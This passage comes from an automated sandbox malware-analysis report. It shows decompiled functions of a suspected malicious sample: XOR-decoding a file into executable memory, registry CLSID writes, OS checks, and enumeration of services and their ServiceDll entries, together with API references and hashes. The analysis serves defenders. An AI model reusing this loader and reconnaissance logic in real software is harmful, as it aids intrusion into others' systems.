                                                            											if(_t69 != 0) {
                                                            												do {
                                                            													if((_t46 & 0x00000001) != 0) {
                                                            														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x0000006a;
                                                            													} else {
                                                            														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x000000a7;
                                                            													}
                                                            													_t46 = _t46 + 1;
                                                            												} while (_t46 < _t69);
                                                            												_t69 = _v12;
                                                            											}
                                                            										}
                                                            										E04645540(_t76, _t69);
                                                            										_t67 = _v24;
                                                            										if(_t67 != 0) {
                                                            											 *_t67 = _v12;
                                                            										}
                                                            										goto L30;
                                                            									} else {
                                                            										VirtualFree(_t76, 0, 0x8000);
                                                            										CloseHandle(_v16);
                                                            										return 0;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            0x04649846
                                                            0x00000000
                                                            0x0464984c
                                                            0x0464984c
                                                            0x04649858
                                                            0x00000000
                                                            0x04649858
                                                            0x04649846
                                                            0x04649820
                                                            0x046497d6
                                                            0x046497e9
                                                            0x046498f1
                                                            0x00000000
                                                            0x046497ef
                                                            0x046497ef
                                                            0x046497f4
                                                            0x046497f6
                                                            0x046497fc
                                                            0x04649803
                                                            0x04649803
                                                            0x04649862
                                                            0x04649862
                                                            0x04649865
                                                            0x0464986f
                                                            0x04649875
                                                            0x04649879
                                                            0x00000000
                                                            0x0464988e
                                                            0x0464988e
                                                            0x04649893
                                                            0x046498bb
                                                            0x046498c2
                                                            0x046498c6
                                                            0x046498c8
                                                            0x046498ca
                                                            0x046498d2
                                                            0x046498cc
                                                            0x046498cc
                                                            0x046498cc
                                                            0x046498d6
                                                            0x046498d7
                                                            0x046498db
                                                            0x046498db
                                                            0x046498c6
                                                            0x046498e0
                                                            0x046498e5
                                                            0x046498ea
                                                            0x046498ef
                                                            0x046498ef
                                                            0x00000000
                                                            0x04649895
                                                            0x0464989d
                                                            0x046498a9
                                                            0x046498b6
                                                            0x046498b6
                                                            0x04649893
                                                            0x04649879
                                                            0x046497e9
                                                            0x046497d4
                                                            0x046497c1

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,?,?,0464C38E,00000001), ref: 0464979D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0464C38E,00000001), ref: 046497B3
                                                            • ReadFile.KERNEL32(?,00000001,00000004,0464C38E,00000000,00000000,?,?,?,0464C38E,00000001), ref: 0464981C
                                                            • SetFilePointer.KERNEL32(?,-00000003,00000000,00000000,?,?,?,0464C38E,00000001), ref: 04649858
                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,0464C38E,00000001), ref: 0464986F
                                                            • ReadFile.KERNEL32(?,00000000,00000000,0464C38E,00000000,?,?,?,0464C38E,00000001), ref: 04649884
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,0464C38E,00000001), ref: 0464989D
                                                            • CloseHandle.KERNEL32(?,?,?,0464C38E,00000001), ref: 046498A9
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,0464C38E,00000001), ref: 046498F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseReadVirtual$AllocChangeCreateFindFreeHandleNotificationPointerSize
                                                            • String ID:
                                                            • API String ID: 3130169213-0
                                                            • Opcode ID: b54a5a89203b35a1350dfb08a9e68202fb7face8d675601da179bda5e7bf7793
                                                            • Instruction ID: d5f31bd4fb38759215434a94ab128345c97a478ffe65280550981870aa7d7399
                                                            • Opcode Fuzzy Hash: b54a5a89203b35a1350dfb08a9e68202fb7face8d675601da179bda5e7bf7793
                                                            • Instruction Fuzzy Hash: BD4185B1B80215AFDF148A79DC48BAF7B79EB94720F204555F504EB280FB71AA44CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 95%
                                                            			E046496B0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t11;
                                                            				int _t20;
                                                            				char* _t26;
                                                            				int _t35;
                                                            				signed int _t38;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t38;
                                                            				_t35 = __edx;
                                                            				_t26 = __ecx;
                                                            				E046454D0(__ecx, __edx);
                                                            				E04646050(__ecx, L"Global",  &_v88, __edx, __esi); // executed
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v612 = 0;
                                                            				_t20 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                            				if(_t20 == 0) {
                                                            					RegSetValueExW(_v612, "1", _t20, 3, _t26, _t35); // executed
                                                            					_t37 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t38);
                                                            			}

                                                            0x046496b9
                                                            0x046496c0
                                                            0x046496c6
                                                            0x046496c8
                                                            0x046496ca
                                                            0x046496d7
                                                            0x046496ec
                                                            0x046496fd
                                                            0x0464971a
                                                            0x04649722
                                                            0x04649734
                                                            0x04649747
                                                            0x0464974a
                                                            0x0464974a
                                                            0x04649762

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 046496EC
                                                            • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0464971A
                                                            • RegSetValueExW.KERNEL32(?,0467E09C,00000000,00000003,00000000,00000000), ref: 04649734
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464974A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 3317ba7478164b274b7c002f074208bd08ec993a68049645b953af61ea80eb24
                                                            • Instruction ID: 9313e852defcb4fb0ff4c1316408cd278ec611d67685f96d19dd2064089f68da
                                                            • Opcode Fuzzy Hash: 3317ba7478164b274b7c002f074208bd08ec993a68049645b953af61ea80eb24
                                                            • Instruction Fuzzy Hash: 1F118A7160521CBBDB24DFA5DC8CEABBB7CEF44715F000199B909E2101FA755E04DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 312 4645960-464597f LoadLibraryA GetProcAddress 313 46459b1-46459b6 312->313 314 4645981-46459a0 GetNativeSystemInfo 312->314 315 46459a2-46459a6 314->315 316 46459a8-46459b0 314->316 315->313 315->316
                                                            C-Code - Quality: 29%
                                                            			E04645960() {
                                                            				intOrPtr _v8;
                                                            				char _v40;
                                                            				_Unknown_base(*)()* _t5;
                                                            				intOrPtr _t8;
                                                            
                                                            				_t5 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t5 == 0) {
                                                            					L4:
                                                            					return 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v8 = 0;
                                                            					asm("movups [ebp-0x24], xmm0");
                                                            					asm("movups [ebp-0x14], xmm0"); // executed
                                                            					 *_t5( &_v40); // executed
                                                            					_t8 = _v40;
                                                            					if(_t8 == 6 || _t8 == 9) {
                                                            						return 1;
                                                            					} else {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            			}

                                                            0x04645977
                                                            0x0464597f
                                                            0x046459b1
                                                            0x046459b6
                                                            0x04645981
                                                            0x04645981
                                                            0x04645984
                                                            0x0464598f
                                                            0x04645993
                                                            0x04645997
                                                            0x04645999
                                                            0x046459a0
                                                            0x046459b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046459a0

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0464C36B), ref: 04645970
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645977
                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 04645997
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2103483237-192647395
                                                            • Opcode ID: 7a453e48e767b0ce3a9e8663d56a1dac4f7f967c0b439090f1a211f52e0f4c58
                                                            • Instruction ID: 848146ea54925f2f0f48972a054bfcc9074b769eaa1a4637a7a724263f7ef917
                                                            • Opcode Fuzzy Hash: 7a453e48e767b0ce3a9e8663d56a1dac4f7f967c0b439090f1a211f52e0f4c58
                                                            • Instruction Fuzzy Hash: 7DF0A731D4534997DF14EAE4D9097E973B4EB98314F505395FC09A2200FA666ED0C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 327 4646ef0-4646f1a OpenProcess 328 4646fa5-4646fb5 call 4655afe 327->328 329 4646f20-4646f37 K32GetModuleFileNameExW 327->329 329->328 330 4646f39-4646f4c call 465d9be 329->330 335 4646f77-4646f7f 330->335 336 4646f4e-4646f51 330->336 338 4646f81-4646f8f 335->338 337 4646f53-4646f61 336->337 337->337 339 4646f63-4646f76 call 4655afe 337->339 338->338 340 4646f91-4646fa4 call 4655afe 338->340
                                                            C-Code - Quality: 45%
                                                            			E04646EF0(long __ecx, short* __edx, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v528;
                                                            				signed int _t14;
                                                            				void* _t17;
                                                            				void* _t21;
                                                            				signed int _t23;
                                                            				signed short* _t26;
                                                            				signed short* _t33;
                                                            				signed int _t36;
                                                            				short* _t41;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t14 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t14 ^ _t44;
                                                            				_t41 = __edx;
                                                            				 *__edx = 0;
                                                            				_t17 = OpenProcess(0x400, 0, __ecx);
                                                            				if(_t17 == 0) {
                                                            					L9:
                                                            					return E04655AFE(_v8 ^ _t44);
                                                            				} else {
                                                            					__imp__GetModuleFileNameExW(_t17, 0,  &_v528, 0x104); // executed
                                                            					if(_t17 == 0) {
                                                            						goto L9;
                                                            					} else {
                                                            						_t21 = E0465D9BE( &_v528, 0x5c);
                                                            						if(_t21 == 0) {
                                                            							_t33 =  &_v528;
                                                            							_t42 = _t41 - _t33;
                                                            							do {
                                                            								_t23 =  *_t33 & 0x0000ffff;
                                                            								_t33 =  &(_t33[1]);
                                                            								 *(_t42 + _t33 - 2) = _t23;
                                                            							} while (_t23 != 0);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						} else {
                                                            							_t26 = _t21 + 2;
                                                            							_t43 = _t41 - _t26;
                                                            							do {
                                                            								_t36 =  *_t26 & 0x0000ffff;
                                                            								_t26 =  &(_t26[1]);
                                                            								 *(_t43 + _t26 - 2) = _t36;
                                                            							} while (_t36 != 0);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            0x04646ef9
                                                            0x04646f00
                                                            0x04646f06
                                                            0x04646f0f
                                                            0x04646f12
                                                            0x04646f1a
                                                            0x04646fa5
                                                            0x04646fb5
                                                            0x04646f20
                                                            0x04646f2f
                                                            0x04646f37
                                                            0x00000000
                                                            0x04646f39
                                                            0x04646f42
                                                            0x04646f4c
                                                            0x04646f77
                                                            0x04646f7f
                                                            0x04646f81
                                                            0x04646f81
                                                            0x04646f84
                                                            0x04646f87
                                                            0x04646f8c
                                                            0x04646fa4
                                                            0x04646f4e
                                                            0x04646f4e
                                                            0x04646f51
                                                            0x04646f53
                                                            0x04646f53
                                                            0x04646f56
                                                            0x04646f59
                                                            0x04646f5e
                                                            0x04646f76
                                                            0x04646f76
                                                            0x04646f4c
                                                            0x04646f37

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000), ref: 04646F12
                                                            • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 04646F2F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileModuleNameOpenProcess
                                                            • String ID:
                                                            • API String ID: 3261405110-0
                                                            • Opcode ID: 53a46fc19bfb535e3538728ec108d1c9e1c6baa2c31b955e6493ab084489f41f
                                                            • Instruction ID: 1faf71b7074f15e6fd3030ba39c242c02b3cbe19606de2a5aa7562e153256c8d
                                                            • Opcode Fuzzy Hash: 53a46fc19bfb535e3538728ec108d1c9e1c6baa2c31b955e6493ab084489f41f
                                                            • Instruction Fuzzy Hash: 5111D675A102085AEF24DF78C84ABBAB3F8DF44300F01419DEC4AD7295FA75AE048754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph image not reproduced; blocks 466cd53-466cdcc with calls to 4668535, 4669220 and 46684ad)
                                                            C-Code - Quality: 91%
                                                            			E0466CD53(void* __esi, void* __eflags) {
                                                            				intOrPtr _v12;
                                                            				void* __ecx;
                                                            				char _t16;
                                                            				void* _t17;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				char _t31;
                                                            				void* _t33;
                                                            				intOrPtr* _t35;
                                                            
                                                            				_push(_t26);
                                                            				_push(_t26);
                                                            				_t16 = E04668535(_t26, 0x40, 0x30); // executed
                                                            				_t31 = _t16;
                                                            				_v12 = _t31;
                                                            				_t28 = _t30;
                                                            				if(_t31 != 0) {
                                                            					_t2 = _t31 + 0xc00; // 0xc00
                                                            					_t17 = _t2;
                                                            					__eflags = _t31 - _t17;
                                                            					if(__eflags != 0) {
                                                            						_t3 = _t31 + 0x20; // 0x20
                                                            						_t35 = _t3;
                                                            						_t33 = _t17;
                                                            						do {
                                                            							_t4 = _t35 - 0x20; // 0x0
                                                            							E04669220(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                            							 *_t35 = 0;
                                                            							_t35 = _t35 + 0x30;
                                                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                            							 *((char*)(_t35 - 0x24)) = 0xa;
                                                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                            							 *((char*)(_t35 - 0x22)) = 0;
                                                            							__eflags = _t35 - 0x20 - _t33;
                                                            						} while (__eflags != 0);
                                                            						_t31 = _v12;
                                                            					}
                                                            				} else {
                                                            					_t31 = 0;
                                                            				}
                                                            				E046684AD(0);
                                                            				return _t31;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04668535: RtlAllocateHeap.NTDLL(00000008,00000001,00000000), ref: 04668576
                                                            • _free.LIBCMT ref: 0466CDBF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 389323fce349f954e8f7e3adb0ceee89fe9bd0c8d1abebbdd79f88e03ef245ec
                                                            • Instruction ID: 7c42fbbc75485794c903e86c5141ea0cf3a95ee0866132888bb682598bd366fc
                                                            • Opcode Fuzzy Hash: 389323fce349f954e8f7e3adb0ceee89fe9bd0c8d1abebbdd79f88e03ef245ec
                                                            • Instruction Fuzzy Hash: 8201F9722007056BE321DF65D841D9AFBEDEB85370F25052EE5D583280FA30B806C778
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph image not reproduced; blocks 4668535-4668591 with calls to RtlAllocateHeap, 466bc5c, 46609ac and 4661772)
                                                            C-Code - Quality: 95%
                                                            			E04668535(void* __ecx, signed int _a4, signed int _a8) {
                                                            				void* __esi;
                                                            				void* _t8;
                                                            				void* _t12;
                                                            				signed int _t13;
                                                            				void* _t15;
                                                            				signed int _t18;
                                                            				long _t19;
                                                            
                                                            				_t15 = __ecx;
                                                            				_t18 = _a4;
                                                            				if(_t18 == 0) {
                                                            					L2:
                                                            					_t19 = _t18 * _a8;
                                                            					if(_t19 == 0) {
                                                            						_t19 = _t19 + 1;
                                                            					}
                                                            					while(1) {
                                                            						_t8 = RtlAllocateHeap( *0x468767c, 8, _t19); // executed
                                                            						if(_t8 != 0) {
                                                            							break;
                                                            						}
                                                            						__eflags = E0466BC5C();
                                                            						if(__eflags == 0) {
                                                            							L8:
                                                            							 *((intOrPtr*)(E04661772())) = 0xc;
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						_t12 = E046609AC(_t15, _t19, __eflags, _t19);
                                                            						_pop(_t15);
                                                            						__eflags = _t12;
                                                            						if(_t12 == 0) {
                                                            							goto L8;
                                                            						}
                                                            					}
                                                            					return _t8;
                                                            				}
                                                            				_t13 = 0xffffffe0;
                                                            				if(_t13 / _t18 < _a8) {
                                                            					goto L8;
                                                            				}
                                                            				goto L2;
                                                            			}

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000), ref: 04668576
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: b6ea7f5692adf36847857172ccd33c5d1676cf4f1746854953adc792254a53cd
                                                            • Instruction ID: 2b83654af2a127131119faf4e36ca3b6263e4302a24f075b54c93c223039f492
                                                            • Opcode Fuzzy Hash: b6ea7f5692adf36847857172ccd33c5d1676cf4f1746854953adc792254a53cd
                                                            • Instruction Fuzzy Hash: AFF0E07161213477A7517E365C04B673B4AEF557B0F188616A817D7150FA30FD004594
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			E04631050(void* __ecx, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _t4;
                                                            				signed int _t12;
                                                            				void* _t13;
                                                            
                                                            				_t4 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t4 ^ _t12;
                                                            				E04671860(__ecx);
                                                            				__imp__#115(_t13); // executed
                                                            				 *0x4687b0c = 0x190;
                                                            				E04655EA1(__eflags, 0x4672fe0);
                                                            				return E04655AFE(_v8 ^ _t12, 0x202);
                                                            			}

                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 0463106E
                                                              • Part of subcall function 04655EA1: __onexit.LIBCMT ref: 04655EA7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Startup__onexit
                                                            • String ID:
                                                            • API String ID: 1034835647-0
                                                            • Opcode ID: ae48e87eb50ff83a06499085d6537dd2973828c8d9ab14928e393fa72d793898
                                                            • Instruction ID: 4ac6a37d85750467349525777a8d7c77c2328d6fa55d709416e4afd423f1a740
                                                            • Opcode Fuzzy Hash: ae48e87eb50ff83a06499085d6537dd2973828c8d9ab14928e393fa72d793898
                                                            • Instruction Fuzzy Hash: C7E04870A00208FBD704EFA5DC0A95D77E4DB09614F40016DA805D7255FA397D14CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04642FB0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				short _v1048;
                                                            				short _v1568;
                                                            				short _v2088;
                                                            				short _v2608;
                                                            				short _v3128;
                                                            				void* _v3132;
                                                            				int* _v3136;
                                                            				int _v3140;
                                                            				WCHAR** _v3144;
                                                            				long _v3148;
                                                            				int* _v3152;
                                                            				long _v3156;
                                                            				void* _v3160;
                                                            				int* _v3164;
                                                            				int* _v3168;
                                                            				void* _v3172;
                                                            				WCHAR* _v3176;
                                                            				WCHAR* _v3180;
                                                            				WCHAR* _v3184;
                                                            				int* _v3188;
                                                            				int _v3192;
                                                            				intOrPtr _v3196;
                                                            				int* _v3200;
                                                            				void* _v3204;
                                                            				void* _v3208;
                                                            				int _v3212;
                                                            				signed int _t206;
                                                            				int* _t214;
                                                            				long _t215;
                                                            				int** _t219;
                                                            				void* _t220;
                                                            				long _t225;
                                                            				void* _t234;
                                                            				WCHAR** _t252;
                                                            				int _t254;
                                                            				int _t255;
                                                            				int _t256;
                                                            				int _t257;
                                                            				int _t258;
                                                            				int _t259;
                                                            				int _t261;
                                                            				int _t263;
                                                            				int _t265;
                                                            				int _t267;
                                                            				int _t271;
                                                            				signed int _t295;
                                                            				signed int _t313;
                                                            				signed int _t319;
                                                            				signed int _t325;
                                                            				signed int _t333;
                                                            				int _t355;
                                                            				intOrPtr _t377;
                                                            				intOrPtr _t378;
                                                            				void* _t389;
                                                            				void* _t390;
                                                            				WCHAR** _t391;
                                                            				WCHAR* _t393;
                                                            				WCHAR* _t394;
                                                            				WCHAR* _t395;
                                                            				WCHAR* _t396;
                                                            				int* _t402;
                                                            				long _t405;
                                                            				void* _t408;
                                                            				int* _t423;
                                                            				void* _t426;
                                                            				void* _t443;
                                                            				WCHAR** _t444;
                                                            				void* _t445;
                                                            				void* _t447;
                                                            				void* _t448;
                                                            				void* _t449;
                                                            				void* _t451;
                                                            				void* _t453;
                                                            				void* _t455;
                                                            				void* _t457;
                                                            				void* _t459;
                                                            				void* _t461;
                                                            				void* _t463;
                                                            				void* _t470;
                                                            				signed int _t473;
                                                            				void* _t474;
                                                            				void* _t475;
                                                            				void* _t476;
                                                            				void* _t477;
                                                            
                                                            				_t206 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t206 ^ _t473;
                                                            				_v3168 = 0;
                                                            				_v3152 = 0;
                                                            				_v3164 = 0;
                                                            				_t389 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				_v3204 = _t389;
                                                            				if(_t389 == 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t473);
                                                            				} else {
                                                            					__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, 0, 0,  &_v3168,  &_v3152,  &_v3164, 0);
                                                            					_t214 = _v3168;
                                                            					if(_t214 != 0) {
                                                            						_t215 =  &(_t214[0xb]);
                                                            						_v3160 = _t215;
                                                            						_t426 = LocalAlloc(0x40, _t215);
                                                            						_v3208 = _t426;
                                                            						if(_t426 != 0) {
                                                            							_v3164 = 0;
                                                            							_t219 =  &_v3168;
                                                            							__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, _t426, _v3160, _t219,  &_v3152,  &_v3164, 0);
                                                            							if(_t219 != 0) {
                                                            								_t220 = LocalAlloc(0x40, 0x19000);
                                                            								_v3132 = _t220;
                                                            								 *_t220 = 0x87;
                                                            								_v3148 = 1;
                                                            								_t390 = LocalAlloc(0x40, 0x2000);
                                                            								_v3188 = 0;
                                                            								_v3160 = _t390;
                                                            								_v3144 = LocalAlloc(0x40, 0x2000);
                                                            								E0465DEA0(_t426,  &_v528, 0, 0x208);
                                                            								_t475 = _t474 + 0xc;
                                                            								_v3200 = 0;
                                                            								if(_v3152 <= 0) {
                                                            									_t225 = 1;
                                                            								} else {
                                                            									_t470 = lstrlenW;
                                                            									_t402 = _t426;
                                                            									_v3136 = _t402;
                                                            									do {
                                                            										_t429 = 0x467c5d0;
                                                            										_v3196 = 0xffffffff;
                                                            										_v3156 = 0x467c5d0;
                                                            										 *_v3144 = 0x467c5d0;
                                                            										_v3176 = 0x467c5d0;
                                                            										_v3180 = 0x467c5d0;
                                                            										_v3184 = 0x467c5d0;
                                                            										_t234 = OpenServiceW(_v3204,  *_t402, 1);
                                                            										_v3140 = _t234;
                                                            										if(_t234 == 0) {
                                                            											_t391 = _v3144;
                                                            										} else {
                                                            											_t402 =  &_v3188;
                                                            											if(QueryServiceConfigW(_t234, _t390, 0x2000, _t402) != 0) {
                                                            												_v3196 =  *((intOrPtr*)(_t390 + 4));
                                                            												_t429 =  !=  ?  *((intOrPtr*)(_t390 + 0xc)) : 0x467c5d0;
                                                            												_t377 =  *((intOrPtr*)(_t390 + 0x10));
                                                            												_v3156 = 0x467c5d0;
                                                            												_t412 =  !=  ? _t377 : 0x467c5d0;
                                                            												_t378 =  *((intOrPtr*)(_t390 + 0x18));
                                                            												_v3176 =  !=  ? _t377 : 0x467c5d0;
                                                            												_t414 =  !=  ? _t378 : 0x467c5d0;
                                                            												_v3180 =  !=  ? _t378 : 0x467c5d0;
                                                            												_t402 =  !=  ?  *((intOrPtr*)(_t390 + 0x1c)) : 0x467c5d0;
                                                            												_v3184 = _t402;
                                                            											}
                                                            											_t391 = _v3144;
                                                            											__imp__QueryServiceConfig2W(_v3140, 1, _t391, 0x2000,  &_v3188);
                                                            											if( *_t391 == 0) {
                                                            												 *_t391 = 0x467c5d0;
                                                            											}
                                                            											CloseServiceHandle(_v3140);
                                                            										}
                                                            										E0465DEA0(_t429,  &_v528, 0, 0x208);
                                                            										E0465DEA0(_t429,  &_v1048, 0, 0x208);
                                                            										wsprintfW( &_v3128, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters",  *_v3136);
                                                            										_v3192 = 0x104;
                                                            										_v3140 = 0;
                                                            										E0465DEA0(_t429,  &_v1048, 0, 0x104);
                                                            										_t476 = _t475 + 0x30;
                                                            										_v3172 = 0;
                                                            										if(RegOpenKeyExW(0x80000002,  &_v3128, 0, 0x20119,  &_v3172) != 0) {
                                                            											L21:
                                                            											_push(_t402);
                                                            											E04645FE0(_t429,  &_v1048);
                                                            											E04645DD0(_t391,  &_v1048,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                            											_t477 = _t476 + 0xc;
                                                            										} else {
                                                            											RegQueryValueExW(_v3172, L"ServiceDll", 0,  &_v3212,  &_v1048,  &_v3192);
                                                            											_t402 = 1;
                                                            											_t363 =  ==  ? 1 : _v3140;
                                                            											_v3140 =  ==  ? 1 : _v3140;
                                                            											RegCloseKey(_v3172);
                                                            											if(_v3140 == 0 || _v3192 <= 0) {
                                                            												goto L21;
                                                            											} else {
                                                            												ExpandEnvironmentStringsW( &_v1048,  &_v528, 0x104);
                                                            												E04645DD0(_t391,  &_v528,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                            												_t477 = _t476 + 8;
                                                            											}
                                                            										}
                                                            										_t252 = _v3136;
                                                            										_v3140 = lstrlenW(_t252[1]);
                                                            										_t254 = lstrlenW( *_t391);
                                                            										_t255 = lstrlenW( *_t252);
                                                            										_t256 = lstrlenW(_v3184);
                                                            										_t257 = lstrlenW(_v3180);
                                                            										_t258 = lstrlenW(_v3176);
                                                            										_t393 = _v3156;
                                                            										_t259 = lstrlenW(_t393);
                                                            										_t261 = lstrlenW( &_v1568);
                                                            										_t263 = lstrlenW( &_v2088);
                                                            										_t265 = lstrlenW( &_v2608);
                                                            										_t267 = lstrlenW( &_v528);
                                                            										_t443 = _v3132;
